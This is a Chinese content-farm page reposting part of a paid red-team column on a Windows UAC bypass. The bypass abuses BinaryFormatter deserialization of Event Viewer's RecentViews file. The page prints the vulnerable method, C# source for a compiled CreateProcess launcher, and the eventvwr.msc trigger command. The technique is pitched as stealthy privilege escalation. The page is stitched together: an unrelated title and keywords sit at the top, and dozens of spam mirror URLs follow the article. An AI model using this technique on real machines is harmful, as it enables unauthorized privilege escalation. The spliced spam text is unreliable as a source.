当前位置: 首页 > news >正文

国外平面设计师常看的网站黄骅招聘信息最新2022

国外平面设计师常看的网站,黄骅招聘信息最新2022,珠海网站开发排名,wordpress添加媒体没反应01阅读须知 此文所节选自小报童《.NET 内网实战攻防》专栏#xff0c;主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧#xff0c;对内网和后渗透感兴趣的朋友们可以订阅该电子报刊#xff0c;解锁更多的报刊内容。 02基本介绍 03原理分析 在渗透测试和红…01阅读须知 此文所节选自小报童《.NET 内网实战攻防》专栏主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧对内网和后渗透感兴趣的朋友们可以订阅该电子报刊解锁更多的报刊内容。 02基本介绍 03原理分析 在渗透测试和红队活动中权限提升是重要的一环尤其是在没有管理员权限的情况下执行更高权限的操作。有一种思路利用 Windows 事件查看器 eventvwr.msc 的高权限加载特性和 XAML 反序列化机制以绕过 UAC 限制。 3.1 Windows事件查看器 在 Windows 系统中事件查看器Event Viewer是一个非常有用的管理工具可以帮助系统管理员和安全分析人员查看系统日志、应用程序日志、安全日志等。通常情况位于当前系统用户下的AppData\Local\Microsoft\Event Viewer目录。 在事件查看器启动过程中Windows 会自动加载 EventViewer.dll这是事件查看器的核心 .NET 组件之一提供事件记录的读取、解析和显示功能如下图所示。 由于 EventViewer.dll内部调用了LoadMostRecentViewsDataFromFile方法此方法调用BinaryFormatter().Deserialize方法反序列化读取最近的事件记录内容核心漏洞代码如下所示。 private void LoadMostRecentViewsDataFromFile() {try{if (!string.IsNullOrEmpty(EventsNode.recentViewsFile) File.Exists(EventsNode.recentViewsFile)){FileStream fileStream new FileStream(EventsNode.recentViewsFile, FileMode.Open);object syncRoot EventsNode.recentViewsDataArrayList.SyncRoot;lock (syncRoot){EventsNode.recentViewsDataArrayList (ArrayList)new BinaryFormatter().Deserialize(fileStream);}fileStream.Close();} }catch (FileNotFoundException){} }3.2 动态编译启动新进程 首先代码中定义了一个名为 CreateSerializedData 的静态方法方法内部的 text 字符串包含一段完整的.NET代码用于创建一个控制台程序内部使用了 DllImport 引入 Windows API 函数 CreateProcess用于在桌面上创建一个新进程。 string text \r\nusing System;\r\nusing System.Runtime.InteropServices;\r\n\r\n\r\nclass HelloWorld\r\n{\r\n [DllImport(\kernel32.dll\)]\r\n private static extern bool CreateProcess(\r\n int dwCreationFlags,\r\n IntPtr lpEnvironment,\r\n ref STARTUPINFO lpStartupInfo,\r\n ref PROCESS_INFORMATION lpProcessInformation);\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n struct STARTUPINFO\r\n {\r\n public Int32 cb;\r\n public string lpReserved;\r\n public string lpDesktop;\r\n public string lpTitle;\r\n public Int32 dwX;\r\n public Int32 dwY;\r\n public Int32 dwXSize;\r\n public Int32 dwYSize;\r\n public Int32 dwXCountChars;\r\n public Int32 dwYCountChars;\r\n public Int32 dwFillAttribute;\r\n public Int32 dwFlags;\r\n public Int16 wShowWindow;\r\n public Int16 cbReserved2;\r\n public IntPtr lpReserved2;\r\n public IntPtr hStdInput;\r\n public IntPtr hStdOutput;\r\n public IntPtr hStdError;\r\n }\r\n\r\n internal struct PROCESS_INFORMATION\r\n {\r\n public IntPtr hProcess;\r\n public IntPtr hThread;\r\n public int dwProcessId;\r\n public int dwThreadId;\r\n }\r\n \r\n\r\n static void Main(string[] args)\r\n {\r\n string DesktopNameargs[0];\r\n string argumentsAsString string.Join(\ \, args, 1, args.Length - 1);\r\n STARTUPINFO si new STARTUPINFO();\r\n si.cb Marshal.SizeOf(si);\r\n si.lpDesktop DesktopName;\r\n PROCESS_INFORMATION pi new PROCESS_INFORMATION();\r\n bool success CreateProcess(\r\n null,\r\n argumentsAsString,\r\n IntPtr.Zero,\r\n IntPtr.Zero,\r\n false,\r\n 48,\r\n IntPtr.Zero,\r\n null,\r\n ref si,\r\n ref pi);\r\n }\r\n}\r\n; Console.ForegroundColor ConsoleColor.Yellow; Console.WriteLine(Compling StartInSelectedDesktop...); compilerParameters.GenerateExecutable true; compilerParameters.OutputAssembly Path.Combine(Path.GetTempPath(), StartInSelectedDesktop.exe);3.3 白加黑启动绕过UAC 利用 eventvwr.msc 进程来触发恶意载荷的反序列化从而绕过用户账户控制 (UAC) 限制启动新的 cmd 进程。因为此时恶意负载已经写入到 C:\Users\Ivan1ee\AppData\Local\Microsoft\Event Viewer\RecentViews自动化打开事件查看器即可触发漏洞。具体代码如下所示 if (!Program.CreateProcess(null, cmd /c start \\ \%windir%\\system32\\eventvwr.msc\, IntPtr.Zero, IntPtr.Zero, false, 48, IntPtr.Zero, null, ref structure, ref process_INFORMATION))综上利用了Windows事件查看器的反序列化漏洞具备强大的UAC绕过能力。在红队渗透测试中其高度隐蔽性和无文件特性而受到广泛应用。 04.NET 电子报刊 小报童电子报刊【.NET内网安全攻防】引入小报童也是为了弥补知识星球对于轻量级阅读支持的不足为用户读者提供更佳的阅读体验。内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧可细分为以下8个方向。 1 .NET 安全防御绕过 2 .NET 本地权限提升 3 .NET 内网信息收集 4 .NET 内网代理通道 5 .NET 内网横向移动 6 .NET 目标权限维持 7 .NET 数据传输外发 8 .NET 目标痕迹清理
文章转载自:
http://www.morning.shnqh.cn.gov.cn.shnqh.cn
http://www.morning.wxfjx.cn.gov.cn.wxfjx.cn
http://www.morning.gfrtg.com.gov.cn.gfrtg.com
http://www.morning.ymhzd.cn.gov.cn.ymhzd.cn
http://www.morning.hjwkq.cn.gov.cn.hjwkq.cn
http://www.morning.xq3nk42mvv.cn.gov.cn.xq3nk42mvv.cn
http://www.morning.hcsnk.cn.gov.cn.hcsnk.cn
http://www.morning.wqbrg.cn.gov.cn.wqbrg.cn
http://www.morning.mdwb.cn.gov.cn.mdwb.cn
http://www.morning.osshjj.cn.gov.cn.osshjj.cn
http://www.morning.rnds.cn.gov.cn.rnds.cn
http://www.morning.xcbnc.cn.gov.cn.xcbnc.cn
http://www.morning.mlckd.cn.gov.cn.mlckd.cn
http://www.morning.hjssh.cn.gov.cn.hjssh.cn
http://www.morning.bsghk.cn.gov.cn.bsghk.cn
http://www.morning.dfwkn.cn.gov.cn.dfwkn.cn
http://www.morning.bhjyh.cn.gov.cn.bhjyh.cn
http://www.morning.tbnn.cn.gov.cn.tbnn.cn
http://www.morning.pjbhk.cn.gov.cn.pjbhk.cn
http://www.morning.bmgdl.cn.gov.cn.bmgdl.cn
http://www.morning.qcfgd.cn.gov.cn.qcfgd.cn
http://www.morning.kmcfw.cn.gov.cn.kmcfw.cn
http://www.morning.bxrlt.cn.gov.cn.bxrlt.cn
http://www.morning.mjytr.cn.gov.cn.mjytr.cn
http://www.morning.ljdhj.cn.gov.cn.ljdhj.cn
http://www.morning.ssgqc.cn.gov.cn.ssgqc.cn
http://www.morning.pccqr.cn.gov.cn.pccqr.cn
http://www.morning.lkbkd.cn.gov.cn.lkbkd.cn
http://www.morning.ylqb8.cn.gov.cn.ylqb8.cn
http://www.morning.bmhc.cn.gov.cn.bmhc.cn
http://www.morning.pzqnj.cn.gov.cn.pzqnj.cn
http://www.morning.lkkgq.cn.gov.cn.lkkgq.cn
http://www.morning.hbhnh.cn.gov.cn.hbhnh.cn
http://www.morning.27asw.cn.gov.cn.27asw.cn
http://www.morning.bzqnp.cn.gov.cn.bzqnp.cn
http://www.morning.pqcbx.cn.gov.cn.pqcbx.cn
http://www.morning.jgnst.cn.gov.cn.jgnst.cn
http://www.morning.gnyhc.cn.gov.cn.gnyhc.cn
http://www.morning.nwbnt.cn.gov.cn.nwbnt.cn
http://www.morning.grxyx.cn.gov.cn.grxyx.cn
http://www.morning.rlbc.cn.gov.cn.rlbc.cn
http://www.morning.dbdmr.cn.gov.cn.dbdmr.cn
http://www.morning.bdtpd.cn.gov.cn.bdtpd.cn
http://www.morning.jypqx.cn.gov.cn.jypqx.cn
http://www.morning.srmdr.cn.gov.cn.srmdr.cn
http://www.morning.cgbgc.cn.gov.cn.cgbgc.cn
http://www.morning.ssglh.cn.gov.cn.ssglh.cn
http://www.morning.hxcuvg.cn.gov.cn.hxcuvg.cn
http://www.morning.qbfs.cn.gov.cn.qbfs.cn
http://www.morning.rgxll.cn.gov.cn.rgxll.cn
http://www.morning.rdwm.cn.gov.cn.rdwm.cn
http://www.morning.zhghd.cn.gov.cn.zhghd.cn
http://www.morning.tnjz.cn.gov.cn.tnjz.cn
http://www.morning.srgyj.cn.gov.cn.srgyj.cn
http://www.morning.xdmsq.cn.gov.cn.xdmsq.cn
http://www.morning.qrmry.cn.gov.cn.qrmry.cn
http://www.morning.qqhersx.com.gov.cn.qqhersx.com
http://www.morning.mtqqx.cn.gov.cn.mtqqx.cn
http://www.morning.rsqpc.cn.gov.cn.rsqpc.cn
http://www.morning.qbfqb.cn.gov.cn.qbfqb.cn
http://www.morning.ryspp.cn.gov.cn.ryspp.cn
http://www.morning.sjbpg.cn.gov.cn.sjbpg.cn
http://www.morning.nxcgp.cn.gov.cn.nxcgp.cn
http://www.morning.zyrp.cn.gov.cn.zyrp.cn
http://www.morning.sftpg.cn.gov.cn.sftpg.cn
http://www.morning.snmsq.cn.gov.cn.snmsq.cn
http://www.morning.kqnwy.cn.gov.cn.kqnwy.cn
http://www.morning.xgkxy.cn.gov.cn.xgkxy.cn
http://www.morning.knlyl.cn.gov.cn.knlyl.cn
http://www.morning.jrhcp.cn.gov.cn.jrhcp.cn
http://www.morning.yrsg.cn.gov.cn.yrsg.cn
http://www.morning.kphsp.cn.gov.cn.kphsp.cn
http://www.morning.syxmx.cn.gov.cn.syxmx.cn
http://www.morning.shuangxizhongxin.cn.gov.cn.shuangxizhongxin.cn
http://www.morning.qjtbt.cn.gov.cn.qjtbt.cn
http://www.morning.0dirty.cn.gov.cn.0dirty.cn
http://www.morning.lkbkd.cn.gov.cn.lkbkd.cn
http://www.morning.qgfkn.cn.gov.cn.qgfkn.cn
http://www.morning.drbd.cn.gov.cn.drbd.cn
http://www.morning.wfdlz.cn.gov.cn.wfdlz.cn
http://www.tj-hxxt.cn/news/237482.html

相关文章:

  • 在线免费源码资源源码站网页制作总结心得
  • 郑州网站建设及托管百度seo优化是做什么的
  • 怎么登陆公司网站的后台营销的网站
  • 北京正规网站建设调整阜阳网站是
  • asp做网站技术怎样海口建设网站建设
  • 重庆黔江做防溺水的网站东莞网络营销班
  • 自己想做网站怎么做网站开发语音
  • gta5办公室网站正在建设黑龙江省高速公路建设局网站
  • 合肥网站建设市场分析企业微信app下载安装官网
  • dedecms 网站名称做微信网站
  • 工信部网站备案号查询网络安装公司
  • 做网站多少钱西宁君博相约泰安58同城招聘网找工作招聘信息
  • 网站开发代码规范百度怎么搜索关键词
  • 做网站的公司现在还赚钱吗企业在线查询系统
  • 做一个推广网站大概多少钱成功网站运营案例
  • 北京网站建设推荐安徽秒搜科技阿里巴巴网站建设过程
  • 安康网站制作网站建设上海网站建设
  • 网站建设需要哪种人才高新区建设局网站
  • 在技校计算机网站建设dw网页设计官网
  • 佛山新网站建设如何网站搭建工作室加盟
  • 郑州网站建设市场重庆网站制作福州
  • 网站建设最好的公司排名河北网站备案 多长时间通过
  • 电子商务网站计划书建设网站网站多少钱
  • 成都网站海口网站建设wordpress 自动上传插件
  • 网站恶意镜像网站优秀设计方案
  • 淘客怎么建网站做推广微信分销系统软件开发
  • 微网站的好处网站建设与管理(第2版)
  • 做环评需要关注哪些网站wordpress 极简 模板
  • 网站建设维护保密协议网站游戏网站建设
  • 青州专业网站建设网站关键词被改